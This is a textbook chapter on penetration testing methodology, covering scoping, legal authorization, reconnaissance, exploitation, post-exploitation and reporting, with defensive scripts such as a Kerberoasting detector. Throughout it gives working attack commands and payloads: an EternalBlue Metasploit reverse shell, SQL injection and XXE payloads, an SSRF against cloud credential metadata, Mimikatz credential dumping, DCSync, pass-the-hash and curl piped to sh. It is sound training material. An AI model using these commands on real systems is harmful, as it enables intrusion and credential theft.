# Chapter 16: Penetration Testing Methodology
## Overview
Penetration testing is the authorized simulation of real-world attacks to identify exploitable weaknesses before adversaries do. A structured methodology separates a professional engagement from ad hoc scanning — it determines scope, governs execution, and produces findings that drive measurable risk reduction. This chapter covers every phase of a penetration test from pre-engagement to reporting, at OSCP/PNPT practitioner level.
Learning Objectives
- Apply PTES, OWASP Testing Guide, and NIST SP 800-115 to scope and execute engagements
- Execute systematic reconnaissance, scanning, exploitation, and post-exploitation phases
- Perform specialized testing against web applications, Active Directory, APIs, and cloud environments
- Document findings to the standard expected by executive and technical audiences
- Navigate the legal and contractual framework that authorizes testing
- Select appropriate tools for each phase of the engagement lifecycle
Prerequisites: Chapters 1–4 (telemetry, logging, detection). Familiarity with TCP/IP, Linux, Windows, and basic scripting.
## Curiosity Hook
The Unlocked Back Door
A regional bank engaged a penetration testing firm to assess their internet perimeter. The testers found nothing critical on the external scope — well-patched, well-segmented. But during passive OSINT, an analyst noticed the bank's IT vendor had a public GitHub repository containing a Terraform module with hardcoded credentials. Twenty minutes later, the tester was authenticated to the bank's AWS management account as an admin.
No firewall was bypassed. No vulnerability was exploited. A third-party contractor's public repository contained the keys to the kingdom. The bank had no visibility into vendor code repositories. The engagement report recommended supplier security clauses, external attack surface monitoring, and quarterly AWS IAM reviews. Total cost of the engagement: $18,000. Estimated cost of the breach it prevented: north of $50M.
## Standards and Frameworks
Multiple standards govern professional penetration testing. Engagements SHOULD reference at least one standard to establish methodology credibility and ensure completeness.
| Framework | Owner | Focus | Best Used For |
|---|---|---|---|
| PTES (Penetration Testing Execution Standard) | Community | Full lifecycle, 7 phases | General network/app engagements |
| OWASP Testing Guide v4.2 | OWASP | Web application testing | Web app and API engagements |
| NIST SP 800-115 | NIST | Technical security testing | Federal/regulated environments |
| OSSTMM 3.0 | ISECOM | Operational security testing | Quantitative risk measurement |
| TIBER-EU | ECB | Threat-intelligence-based red teaming | Financial sector, regulators |
| CBEST | Bank of England | Intelligence-led testing | UK financial firms |
### PTES — 7 Phases
```mermaid
flowchart LR
    A[Pre-Engagement\nInteractions] --> B[Intelligence\nGathering]
    B --> C[Threat Modeling]
    C --> D[Vulnerability\nAnalysis]
    D --> E[Exploitation]
    E --> F[Post\nExploitation]
    F --> G[Reporting]
    style A fill:#1e3a5f,color:#e6edf3
    style G fill:#1a3a1a,color:#e6edf3
```
## Phase 1 — Pre-Engagement
The pre-engagement phase establishes legal authorization, defines scope, and sets expectations. It is the most critical phase — proceeding without clear authorization violates the Computer Fraud and Abuse Act (18 U.S.C. § 1030) in the US and the Computer Misuse Act 1990 in the UK.
### Legal Documents Required
- Master Service Agreement (MSA): overarching legal relationship between firm and client
- Statement of Work (SOW): specific engagement scope, deliverables, timeline, cost
- Rules of Engagement (RoE): operational parameters — what is in/out of scope, testing hours, kill-switch contacts
- Permission to Test letter: explicit written authorization from the asset owner, not just the client contact
### Scoping Checklist
A well-scoped engagement prevents both scope creep and dangerous surprises. The scoping document SHALL include:
- IP ranges and CIDR blocks in scope (and explicitly excluded)
- Domain names and subdomains in scope
- Cloud account IDs (AWS, Azure, GCP) in scope
- Applications explicitly in scope (with version and URL)
- Physical locations in scope (for physical assessments)
- Out-of-scope systems (production databases, third-party SaaS, critical infrastructure)
- Testing window: dates, times, time zones
- Emergency contacts: client security lead, NOC, legal counsel
- Kill-switch procedure: who to call and how if something breaks
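A scope check a tester can run before every scan, written as an added example for this chapter rather than taken from it: it loads the RoE's in-scope ranges, exclusions and testing window (the CIDRs, addresses and dates below are constructed placeholders) and sorts a target list into allowed, excluded and out-of-scope buckets, with exclusions taking precedence over inclusions and the window reported separately.

```python
"""Scope guard for a target list: refuses hosts outside the authorized CIDR
ranges, inside an explicit exclusion, or outside the testing window.
Added example (not from the chapter); every range, address and date below
is a constructed placeholder standing in for the real RoE values."""
import ipaddress
from datetime import datetime, timezone

# Constructed Rules-of-Engagement data (hypothetical values).
ROE = {
    "in_scope": ["192.168.1.0/24", "10.10.0.0/16"],
    "excluded": ["192.168.1.250/32", "10.10.5.0/24"],  # e.g. production DB, partner-hosted segment
    "window": ("2025-03-03T08:00:00+00:00", "2025-03-07T18:00:00+00:00"),
}


def _networks(cidrs):
    return [ipaddress.ip_network(c, strict=False) for c in cidrs]


def target_status(target, roe=ROE):
    """Return 'allowed', 'excluded' or 'out-of-scope' for one IP address.
    Exclusions are checked first, so an excluded host that sits inside an
    in-scope range is still refused."""
    ip = ipaddress.ip_address(target)
    if any(ip in net for net in _networks(roe["excluded"])):
        return "excluded"
    if any(ip in net for net in _networks(roe["in_scope"])):
        return "allowed"
    return "out-of-scope"


def in_window(roe=ROE, now_iso=None):
    """True when now_iso (ISO-8601 with UTC offset; default: current UTC time)
    falls inside the agreed testing window."""
    start, end = (datetime.fromisoformat(t) for t in roe["window"])
    now = datetime.fromisoformat(now_iso) if now_iso else datetime.now(timezone.utc)
    return start <= now <= end


def check_targets(targets, roe=ROE, now_iso=None):
    """Partition a target list. Nothing should be scanned unless
    window_open is True and the host is in the 'allowed' bucket."""
    result = {"window_open": in_window(roe, now_iso),
              "allowed": [], "excluded": [], "out-of-scope": []}
    for target in targets:
        result[target_status(target, roe)].append(target)
    return result


if __name__ == "__main__":
    print(check_targets(["192.168.1.10", "192.168.1.250", "10.10.5.7", "172.16.0.5"],
                        now_iso="2025-03-04T10:00:00+00:00"))
```

Feed only the `allowed` bucket to the scanner; anything that lands in the other two buckets is a scoping conversation with the client, not a target.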
### Legal Framework Reference
| Jurisdiction | Relevant Law | Key Provision |
|---|---|---|
| United States | CFAA (18 U.S.C. § 1030) | Unauthorized access to computers is a federal felony |
| United States | ECPA | Wire and electronic communications interception |
| United Kingdom | Computer Misuse Act 1990 | Unauthorized access, modification, impairment |
| European Union | Directive 2013/40/EU | Criminal offenses for computer intrusion |
| Australia | Criminal Code Act 1995 | Unauthorized computer access |
Third-Party Authorization
Testing cloud infrastructure REQUIRES authorization from the cloud provider, not just the client. AWS, Azure, and GCP all have penetration testing policies. Violating these terms can result in account suspension even with client authorization.
## Phase 2 — Reconnaissance
### Passive Reconnaissance
Passive recon collects publicly available information from third-party sources without sending anything to target systems, so the target has no opportunity to detect it.
WHOIS and DNS:
```bash
# WHOIS lookup
whois example.com
# Passive DNS history
# Tools: SecurityTrails, PassiveTotal, ViewDNS.info
# DNS zone transfer attempt. Note: this queries the target's own nameserver,
# so it is active reconnaissance and belongs after written authorization is confirmed
dig axfr @ns1.example.com example.com
# Subdomain enumeration (passive)
amass enum -passive -d example.com -o subdomains.txt
# Certificate transparency logs (-r strips jq's quotes so sort -u dedupes cleanly)
curl -s "https://crt.sh/?q=%25.example.com&output=json" | jq -r '.[].name_value' | sort -u
```
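The crt.sh query above returns raw `name_value` fields that still need cleaning before they become a target list: one field may hold several names joined by newlines, letter case varies by issuer, and wildcard entries name zones rather than hosts. The following added example (not part of the chapter; `SAMPLE_CRTSH_JSON` is constructed to mimic the shape of crt.sh's JSON) normalizes such output into deduplicated hosts and wildcard bases and drops any name that does not sit under the assessed domain.

```python
"""Normalize crt.sh certificate-transparency output into a deduplicated
subdomain list. Added example (not from the chapter); SAMPLE_CRTSH_JSON is a
constructed stand-in with the same shape as crt.sh's JSON output (a list of
objects carrying a 'name_value' field)."""
import json

# Constructed sample: several SANs joined by newlines in one name_value,
# mixed letter case, a wildcard entry, and one unrelated name to be filtered.
SAMPLE_CRTSH_JSON = json.dumps([
    {"name_value": "www.example.com\nexample.com"},
    {"name_value": "*.dev.example.com"},
    {"name_value": "API.Example.com"},
    {"name_value": "mail.example.com\nwww.example.com"},
    {"name_value": "example.com.lookalike-placeholder.test"},
])


def parse_crtsh(raw_json, domain):
    """Return {'hosts': [...], 'wildcards': [...]} for names under `domain`.
    Wildcard bases are kept apart because '*.dev.example.com' proves only
    that the zone exists, not that any particular host in it does."""
    domain = domain.lower()
    hosts, wildcards = set(), set()
    for entry in json.loads(raw_json):
        for name in entry.get("name_value", "").splitlines():
            name = name.strip().lower()
            if not name:
                continue
            is_wildcard = name.startswith("*.")
            if is_wildcard:
                name = name[2:]
            # Suffix match including the dot: 'example.com.lookalike...' is rejected,
            # and so is any other name that merely contains the domain string.
            if name != domain and not name.endswith("." + domain):
                continue
            (wildcards if is_wildcard else hosts).add(name)
    return {"hosts": sorted(hosts), "wildcards": sorted(wildcards)}


if __name__ == "__main__":
    print(parse_crtsh(SAMPLE_CRTSH_JSON, "example.com"))
```

The `hosts` list feeds DNS resolution and the scope check; the `wildcards` list is a prompt to ask the client which hosts actually live under those zones.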
Internet-Wide Scanning (OSINT):
```bash
# Shodan — find all hosts for an organization
shodan search "org:\"Example Corp\"" --fields ip_str,port,org,hostnames
# Find exposed admin panels
shodan search "http.title:\"admin\" org:\"Example Corp\""
# Censys — TLS certificate search
# Search: parsed.names: example.com
```
Google Dorking:
```text
site:example.com filetype:pdf              # Published documents
site:example.com inurl:admin               # Admin interfaces
site:example.com "index of" "password"     # Exposed directories
site:example.com ext:conf OR ext:env       # Config files
"@example.com" filetype:xls                # Spreadsheets with email addresses
site:github.com "example.com" password     # Leaked credentials on GitHub
```
Email and Personnel Intel:
```bash
# theHarvester — emails, subdomains, IPs
theHarvester -d example.com -b google,bing,linkedin,shodan -l 500
# Hunter.io (API) — find email format
curl "https://api.hunter.io/v2/domain-search?domain=example.com&api_key=KEY"
# GitHub — search for secrets in public repos
# Search: "example.com" "password" OR "secret" OR "api_key"
# Tools: truffleHog, gitleaks on discovered repos
```
### Active Reconnaissance
Active recon sends traffic to target systems, so hosts MAY detect it. It SHALL only begin after written authorization is confirmed.
```bash
# Host discovery
nmap -sn 192.168.1.0/24 -oG hosts-up.txt
# Full TCP port scan (all 65535 ports); --min-rate trades accuracy for speed
nmap -p- --min-rate 5000 -oA full-scan 192.168.1.10
# Service version detection + default scripts + OS detection on the ports found open
nmap -sV -sC -O -p 22,80,443,8080 192.168.1.10 -oA svc-scan
# UDP scan (top 100 ports)
nmap -sU --top-ports 100 192.168.1.10
# Aggressive scan (not stealthy)
nmap -A -p- 192.168.1.10
```
## Phase 3 — Scanning and Enumeration
### Vulnerability Scanning
```bash
# Nessus CLI (if available)
nessuscli scan --name "Engagement Scan" --policy "Advanced Scan" --targets targets.txt
# OpenVAS (open-source alternative) via the legacy omp client; current Greenbone releases ship gvm-cli instead
omp -u admin -w password -C -c "Full and fast" -t 192.168.1.0/24
# Nikto — web server scanning
nikto -h https://example.com -output nikto-results.txt -Format txt
```
### Web Enumeration
```bash
# Directory/file brute force
gobuster dir -u https://example.com -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt \
    -x php,txt,html,bak -o gobuster-results.txt
# ffuf — fast fuzzing with filter
ffuf -u https://example.com/FUZZ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/big.txt \
    -fc 404 -o ffuf-results.json
# Parameter discovery
ffuf -u "https://example.com/api?FUZZ=test" -w /usr/share/wordlists/SecLists/Discovery/Web-Content/burp-parameter-names.txt
```
### Service-Specific Enumeration
```bash
# SMB enumeration
enum4linux-ng -A 192.168.1.10 | tee enum4linux-output.txt
smbclient -L //192.168.1.10 -N
smbmap -H 192.168.1.10
# LDAP enumeration (Active Directory)
ldapsearch -x -H ldap://192.168.1.10 -b "DC=example,DC=com" -s sub "(objectClass=*)"
# SMTP user enumeration
smtp-user-enum -M VRFY -U /usr/share/wordlists/SecLists/Usernames/Names/names.txt -t 192.168.1.25
# SNMP enumeration
snmpwalk -c public -v 2c 192.168.1.1
onesixtyone -c /usr/share/wordlists/SecLists/Discovery/SNMP/snmp.txt 192.168.1.1
```
## Phase 4 — Exploitation
### Metasploit Framework
```text
# Launch Metasploit
msfconsole
# Search for exploits
search eternalblue
search type:exploit platform:windows
# Use a module
use exploit/windows/smb/ms17_010_eternalblue
show options
set RHOSTS 192.168.1.10
set LHOST 192.168.1.100
set PAYLOAD windows/x64/meterpreter/reverse_tcp
run
# Meterpreter commands after shell
sysinfo        # System information
getuid         # Current user
getsystem      # Attempt privilege escalation
hashdump       # Dump NTLM hashes
run post/multi/recon/local_exploit_suggester
```
### Web Application Exploitation
SQL Injection:
```text
# sqlmap — automated SQL injection
sqlmap -u "https://example.com/product?id=1" --dbs --batch
sqlmap -u "https://example.com/login" --data "user=admin&pass=test" --level=5 --risk=3 --dump
# Manual SQLi test
' OR '1'='1
' UNION SELECT null,null,null--
' AND 1=CONVERT(int,(SELECT TOP 1 name FROM sysobjects WHERE xtype='U'))--
```
Common Web Vulnerabilities:
```text
# XXE (XML External Entity)
# Payload in XML body:
# <?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>
# SSRF — test internal access
curl "https://example.com/api/fetch?url=http://169.254.169.254/latest/meta-data/"
# Command injection
; id
| id
`id`
$(id)
# SSTI (Server-Side Template Injection)
{{7*7}}        # Returns 49 — Jinja2/Twig
${7*7}         # Returns 49 — FreeMarker
<%= 7*7 %>     # Returns 49 — ERB
```
### Password Attacks
```bash
# Hashcat — GPU cracking
hashcat -m 1000 ntlm-hashes.txt /usr/share/wordlists/rockyou.txt          # NTLM
hashcat -m 1800 shadow-hashes.txt /usr/share/wordlists/rockyou.txt --rules-file /usr/share/hashcat/rules/best64.rule
hashcat -m 13100 kerberoast-hashes.txt /usr/share/wordlists/rockyou.txt   # TGS/Kerberoast
# Password spraying
crackmapexec smb 192.168.1.0/24 -u users.txt -p 'Winter2025!' --continue-on-success
kerbrute passwordspray -d example.com --dc 192.168.1.1 users.txt 'Welcome1'
```
## Phase 5 — Post-Exploitation
### Privilege Escalation
Windows:
```text
# Check current privileges
whoami /priv
whoami /groups
# Run WinPEAS (privilege escalation enumeration)
.\winPEASany.exe
# AlwaysInstallElevated check
reg query HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
# Unquoted service paths
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\"
# Token impersonation with Meterpreter
load incognito
list_tokens -u
impersonate_token "NT AUTHORITY\\SYSTEM"
```
Linux:
```bash
# Run LinPEAS
curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh | sh
# SUID binaries
find / -perm -4000 -type f 2>/dev/null
# Sudo rights
sudo -l
# Cron jobs running as root
cat /etc/crontab
ls -la /etc/cron.*
```
### Lateral Movement
```text
# Pass-the-Hash
crackmapexec smb 192.168.1.0/24 -u Administrator -H 'aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c'
# PsExec via Impacket
impacket-psexec example.com/administrator:password@192.168.1.10
# WMI execution
impacket-wmiexec example.com/administrator:password@192.168.1.10
# PTT (Pass-the-Ticket) with Rubeus
Rubeus.exe asktgt /user:administrator /rc4:HASH /ptt
Rubeus.exe kerberoast /outfile:kerberoast.hashes
# SecretsDump — remote NTLM hash dump
impacket-secretsdump example.com/administrator:password@192.168.1.10
```
### Credential Dumping
```text
# Mimikatz
privilege::debug
sekurlsa::logonpasswords                                    # Dump plaintext creds from LSASS
lsadump::sam                                                # SAM database
lsadump::dcsync /domain:example.com /user:Administrator     # DCSync
# Remote DCSync of a single account via Impacket: a replication request to the DC,
# so no LSASS access on the DC is needed (it still surfaces as a directory replication event)
impacket-secretsdump -just-dc-user krbtgt example.com/administrator:password@192.168.1.1
```
## Phase 6 — Specialized Testing Areas
### Active Directory
```text
# BloodHound data collection
.\SharpHound.exe -c All --zipfilename bloodhound-data.zip
# Import to BloodHound, then query:
# "Find Shortest Paths to Domain Admins"
# "Find Kerberoastable Users"
# "Find AS-REP Roastable Users"
# "Shortest Paths to Unconstrained Delegation Systems"
# Kerberoasting
impacket-GetUserSPNs -request -dc-ip 192.168.1.1 example.com/jdoe:password -outputfile kerberoast.hashes
# AS-REP Roasting (no preauth required)
impacket-GetNPUsers -dc-ip 192.168.1.1 -no-pass -usersfile users.txt example.com/
```
### Web Application (OWASP Top 10)
| Vulnerability | Test Technique | Tool |
|---|---|---|
| Broken Access Control | IDOR: change ID param in requests | Burp Suite Repeater |
| Cryptographic Failures | Check TLS version, cipher suites | testssl.sh, sslyze |
| Injection (SQLi) | ' OR 1=1-- in all inputs | sqlmap, Burp Suite |
| SSRF | Test URL params pointing inward | Burp Collaborator |
| XXE | Inject DOCTYPE with external entity | Burp Suite |
| Deserialization | Intercept serialized objects | ysoserial, PHPGGC |
| Security Misconfiguration | Directory listing, default creds | Nikto, manual |
| XSS | <script>alert(1)</script> variants | Dalfox, XSStrike |
### Cloud Penetration Testing
```text
# AWS — check for metadata SSRF
curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/
# Enumerate AWS with Pacu (after getting creds)
python3 pacu.py
Pacu > import_keys
Pacu > run iam__enum_permissions
Pacu > run iam__privesc_scan
# Check for overly permissive S3
aws s3 ls s3://target-bucket --no-sign-request   # Unauthenticated
aws s3 ls s3://target-bucket                     # Authenticated
```
## Phase 7 — Reporting
A penetration test is only as valuable as its report. Technical findings without actionable remediation guidance are wasted effort.
### Report Structure
1. Executive Summary (1-2 pages)
    - Engagement objective and scope
    - Overall risk posture (Critical/High/Medium/Low counts)
    - Most significant findings in plain language
    - Top 3 remediation priorities
2. Methodology
    - Standards followed (PTES, OWASP)
    - Testing phases and techniques used
    - Tools used
3. Technical Findings (one section per finding)
    - Title
    - Risk Rating: Critical / High / Medium / Low / Informational
    - CVSS v3.1 Score
    - Description
    - Evidence (screenshots, command output)
    - Business Impact
    - Remediation Recommendation
    - References (CVE, CWE, OWASP)
4. Remediation Roadmap
    - Prioritized by risk
    - Estimated effort
    - Quick wins vs. strategic improvements
5. Appendices
    - Scope confirmation
    - Tool versions
    - Raw scan output
### Sample Finding Template
Finding: Kerberoastable Service Account with Weak Password

- Title: Service Account Password Cracked via Kerberoasting
- Risk Rating: Critical | CVSS v3.1: 9.0 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)
- Description: The service account `svc_backup` has a Service Principal Name (SPN) registered, making it susceptible to Kerberoasting. An attacker with any domain user account can request a Kerberos service ticket for it, which is encrypted with a key derived from the account's password (its NTLM hash under RC4), take the ticket offline, and crack it. The account's password (`Backup2019!`) appears in the rockyou.txt wordlist and was cracked in under 4 minutes.
- Evidence: `hashcat -m 13100 kerberoast.hashes rockyou.txt` → cracked in 3m 47s
- Business Impact: `svc_backup` has local administrator rights on 47 servers. A threat actor could leverage this for full domain compromise via lateral movement.
- Remediation:
    1. Change the `svc_backup` password to a 25+ character random string
    2. Migrate to a Group Managed Service Account (gMSA) — password rotates automatically
    3. Audit all service accounts with SPNs: `Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName`
    4. Implement Kerberoasting detection (Event ID 4769 with EncryptionType 0x17)
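Remediation item 4 names the detection signal (Event ID 4769 with EncryptionType 0x17). The following added example, not from the chapter, turns that signal into detection logic over constructed 4769 records: it keeps successful RC4 TGS requests for non-machine service accounts and reports any requesting user who pulled tickets for several distinct SPNs, which separates a Kerberoasting sweep from the single RC4 ticket a legacy application legitimately requests. The key=value line format, the field names as exported, and the threshold of three are assumptions of the example.

```python
"""Flag likely Kerberoasting from Windows Security Event ID 4769 records.
Added example (not from the chapter). The records below are constructed,
not captured; the flattened key=value export format is an assumption."""
import re
from collections import defaultdict

# Constructed 4769 events. Field names follow the event's XML schema
# (TargetUserName, ServiceName, TicketEncryptionType, IpAddress, Status).
SAMPLE_4769 = [
    "EventID=4769 TargetUserName=jdoe@EXAMPLE.COM ServiceName=svc_backup TicketEncryptionType=0x17 IpAddress=::ffff:192.168.1.50 Status=0x0",
    "EventID=4769 TargetUserName=jdoe@EXAMPLE.COM ServiceName=svc_sql TicketEncryptionType=0x17 IpAddress=::ffff:192.168.1.50 Status=0x0",
    "EventID=4769 TargetUserName=jdoe@EXAMPLE.COM ServiceName=svc_web TicketEncryptionType=0x17 IpAddress=::ffff:192.168.1.50 Status=0x0",
    "EventID=4769 TargetUserName=jdoe@EXAMPLE.COM ServiceName=svc_ci TicketEncryptionType=0x17 IpAddress=::ffff:192.168.1.50 Status=0x0",
    "EventID=4769 TargetUserName=jdoe@EXAMPLE.COM ServiceName=svc_mon TicketEncryptionType=0x17 IpAddress=::ffff:192.168.1.50 Status=0x0",
    # AES tickets for a machine account and krbtgt: normal traffic.
    "EventID=4769 TargetUserName=asmith@EXAMPLE.COM ServiceName=FS01$ TicketEncryptionType=0x12 IpAddress=::ffff:192.168.1.60 Status=0x0",
    "EventID=4769 TargetUserName=asmith@EXAMPLE.COM ServiceName=krbtgt TicketEncryptionType=0x12 IpAddress=::ffff:192.168.1.60 Status=0x0",
    # One RC4 ticket from a legacy application: below threshold, not reported.
    "EventID=4769 TargetUserName=legacyapp@EXAMPLE.COM ServiceName=svc_print TicketEncryptionType=0x17 IpAddress=::ffff:192.168.1.70 Status=0x0",
    # Failed request (non-zero Status) is ignored.
    "EventID=4769 TargetUserName=jdoe@EXAMPLE.COM ServiceName=svc_old TicketEncryptionType=0x17 IpAddress=::ffff:192.168.1.50 Status=0x1f",
]

KV = re.compile(r"(\w+)=(\S+)")


def parse_event(line):
    """Parse one flattened key=value record into a dict."""
    return dict(KV.findall(line))


def is_rc4_tgs_request(ev):
    """A successful RC4 (0x17) TGS request for a user-account SPN, i.e. not a
    machine account (trailing $) and not krbtgt, is the signature the
    remediation item cites."""
    service = ev.get("ServiceName", "")
    return (ev.get("EventID") == "4769"
            and ev.get("TicketEncryptionType", "").lower() == "0x17"
            and ev.get("Status") == "0x0"
            and not service.endswith("$")
            and service.lower() != "krbtgt")


def detect_kerberoasting(lines, threshold=3):
    """Group matching requests by requesting user and report users who
    obtained tickets for `threshold` or more distinct service accounts."""
    per_user = defaultdict(set)
    for line in lines:
        ev = parse_event(line)
        if is_rc4_tgs_request(ev):
            per_user[ev["TargetUserName"]].add(ev["ServiceName"])
    return {user: sorted(spns) for user, spns in per_user.items()
            if len(spns) >= threshold}


if __name__ == "__main__":
    for user, spns in detect_kerberoasting(SAMPLE_4769).items():
        print(f"possible Kerberoasting by {user}: {len(spns)} RC4 service tickets {spns}")
```

In a SIEM the same logic is a count of distinct `ServiceName` values per `TargetUserName` over a short window; the per-user grouping matters because the hashes cracked in the finding above were all obtained with one low-privilege account.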
## Common Failure Modes
| Failure | Consequence | Prevention |
|---|---|---|
| Inadequate scope documentation | Testing prohibited systems, legal liability | Detailed RoE with explicit exclusions |
| No kill-switch agreement | Crashing production systems with no escalation path | Define emergency contacts in writing |
| Testing without change management | Blocked by change management post-engagement | Involve change management in pre-engagement |
| Missing cloud provider authorization | Account suspension, legal action | Check CSP's pentest policy before testing |
| Incomplete cleanup | Test artifacts remain (backdoors, tools) | Cleanup checklist in SOW, confirmed by client |
| Overly technical report | Executives ignore findings | Always include executive summary and business impact |
| Scope creep | Testing unauthorized systems | Strict change control for scope modifications |
## Exam Prep & Certifications
Relevant Certifications
The topics in this chapter align with the following certifications:
- OSCP — Domains: Penetration Testing Methodology, Exploitation, Post-Exploitation
- GIAC GPEN — Domains: Penetration Testing, Exploitation, Scanning
- CompTIA PenTest+ — Domains: Planning, Information Gathering, Attacks, Reporting
## Benchmark Controls Tested
| Nexus SecOps Control | Control Description | Related Findings |
|---|---|---|
| Nexus SecOps-D-047 | External attack surface monitoring | OSINT phase findings |
| Nexus SecOps-D-048 | Vulnerability management SLA compliance | Unpatched CVEs exploited |
| Nexus SecOps-D-052 | Privileged account access controls | Kerberoasting, Pass-the-Hash |
| Nexus SecOps-D-061 | Cloud IAM least-privilege | AWS/Azure privilege escalation |
| Nexus SecOps-D-073 | Web application security testing | OWASP Top 10 findings |
## Key Terms
| Term | Definition |
|---|---|
| Rules of Engagement (RoE) | Operational parameters governing what testers may and may not do |
| Scope | The defined set of systems, networks, and applications authorized for testing |
| PTES | Penetration Testing Execution Standard — 7-phase methodology |
| Kerberoasting | Offline cracking of Kerberos service tickets to recover service account passwords |
| Pass-the-Hash | Using a captured NTLM hash to authenticate without knowing the plaintext password |
| Post-exploitation | Activities performed after gaining initial access: persistence, lateral movement, exfiltration |
| Pivot | Using a compromised host as a relay to reach otherwise inaccessible network segments |
| BloodHound | Graph-based tool for visualizing Active Directory attack paths |
| CVSS | Common Vulnerability Scoring System — standardized vulnerability severity scoring |
| DCSync | Technique to extract NTLM hashes from a domain controller by impersonating a replication partner |